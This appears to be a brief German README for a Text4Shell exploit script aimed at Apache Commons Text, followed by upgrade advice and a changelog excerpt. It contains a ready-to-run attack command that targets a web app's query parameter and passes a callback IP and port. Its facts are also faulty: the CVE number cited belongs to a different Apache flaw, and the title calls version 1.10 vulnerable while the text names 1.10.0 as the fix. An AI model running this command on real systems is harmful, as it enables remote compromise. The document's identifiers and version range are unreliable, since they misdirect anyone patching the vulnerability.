
Text4shell-Skript für Text Commons <=1.10 CVE-2022-33980
text4shell script for text coomons < =1.10 CVE-2022-33980
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22
Die Hauptlösung besteht darin, die Komponente Apache Commons Text dringend auf die verfügbaren Versionen zu aktualisieren, die diese Sicherheitslücke beheben. Konkret sollte auf eine Version 1.10.0 oder höher von Apache Commons Text aktualisiert werden.
In diesem Update wurde beschlossen, diese problematischen Ersetzungen standardmäßig zu deaktivieren. In der Changelog-Datei der Bibliothek ist die folgende Änderung enthalten:
Make default string lookups configurable vía system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled vía system property. See StringLookupFactory for details.
Apache hat eine Mitteilung mit offiziellen Informationen und einem Verweis auf das Update veröffentlicht, das das Problem behebt.